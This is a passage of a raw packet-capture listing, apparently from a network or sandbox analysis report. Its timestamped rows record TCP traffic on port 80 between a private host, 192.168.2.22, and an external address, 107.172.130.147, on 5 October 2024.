                                                                                                                                      Oct 5, 2024 14:52:57.707339048 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707349062 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.707349062 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707361937 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707375050 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.707405090 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.707498074 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707637072 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707679987 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.707798958 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707811117 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707820892 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707832098 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707842112 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707849026 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.707856894 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707868099 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.707901955 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.707947016 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707957983 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.707998991 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.708858013 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.708868980 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.708880901 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.708893061 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.708910942 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.708940983 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.709572077 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.709583044 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.709623098 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.711433887 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.711617947 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.711628914 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.711638927 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.711649895 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.711661100 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.711673021 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.711703062 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.711787939 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.711800098 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.711808920 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.711821079 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.711843014 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.711870909 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.712153912 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.712165117 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.712176085 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.712188005 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.712202072 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.712209940 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.712239027 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.712301970 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.712315083 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.712325096 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.712336063 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.712346077 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.712352037 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.712378979 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.746463060 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.746474981 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.746486902 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.746498108 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.746510983 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.746602058 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.746603012 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.790369987 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.790393114 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.790411949 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.790424109 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.790436029 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.790446997 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.790456057 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.790462017 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.790466070 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.790476084 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.790487051 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.790498018 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.790507078 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.790517092 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.790519953 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.790517092 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.790565014 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.790565014 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.790594101 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.790697098 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.790898085 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.790913105 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.790925026 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.790935993 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.790945053 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.790947914 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.790960073 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.790966034 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.790971994 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.791002989 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.791035891 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.791047096 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.791057110 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.791065931 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.791076899 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.791085005 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.791086912 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.791100979 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.791106939 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.791111946 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.791126966 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.791137934 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.791208029 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.791408062 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.791449070 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.791603088 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.791613102 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.791623116 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.791635990 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.791646957 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.791651011 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.791659117 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.791670084 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.791673899 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.791681051 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.791692972 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.791702986 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.791727066 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.791747093 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.791758060 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.791768074 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.791778088 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.791789055 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.791800976 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.791817904 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.791987896 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.792005062 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.792016029 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.792026043 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.792037010 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.792046070 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.792047024 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.792057991 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.792068005 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.792069912 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.792089939 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.792094946 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.792102098 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.792112112 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.792123079 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.792133093 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.792139053 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.792144060 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.792156935 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.792166948 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.792170048 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.792186022 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.797899961 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.797956944 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.798053026 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.798233032 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.798243999 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.798255920 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.798266888 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.798280001 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.798286915 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.798291922 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.798305035 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.798307896 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.798337936 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.798372030 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.798382998 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.798394918 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.798425913 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.798465014 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.798476934 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.798486948 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.798499107 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.798520088 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.798551083 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.798557997 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.798748016 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.798758984 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.798770905 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.798782110 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.798794031 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.798804998 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.798805952 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.798819065 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.798826933 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.798831940 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.798847914 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.798870087 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.798911095 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.798924923 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.798934937 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.798949003 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.798959017 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.798965931 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.798973083 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.798985958 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.799022913 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.799073935 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.799086094 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.799096107 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.799108982 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.799119949 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.799134016 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.799186945 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.799226999 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.799237967 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.799248934 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.799261093 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.799278975 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.799310923 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.799458981 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.799469948 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.799487114 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.799515009 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.876785040 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.876826048 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.876836061 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.876852036 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.876863956 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.876873970 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.876885891 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.876897097 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.876979113 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.876988888 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877001047 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877011061 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877017021 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877021074 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877026081 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877073050 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.877135992 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.877135992 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.877160072 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877207994 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877219915 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877243042 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877253056 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877263069 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.877294064 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.877379894 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877394915 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877407074 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877418995 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877449036 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.877471924 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877482891 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877497911 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877509117 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877521038 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877528906 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.877562046 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.877646923 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877667904 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877677917 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877712011 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.877741098 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877752066 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877763033 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877796888 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.877842903 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877852917 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877862930 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877873898 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877886057 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877892971 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.877898932 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877914906 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.877944946 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.877958059 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877968073 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877978086 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.877989054 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.878000021 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.878002882 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.878010988 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.878036022 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.878068924 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.878339052 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.878340006 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.878351927 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.878364086 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.878398895 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.878427029 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.878437996 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.878448009 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.878459930 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.878482103 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.878587008 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.878597021 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.878613949 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.878626108 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.878635883 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.878644943 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.878648043 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.878663063 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.878668070 CEST4916380192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:57.878683090 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.878695011 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.878704071 CEST8049163107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:57.878710032 CEST4916380192.168.2.22107.172.130.147
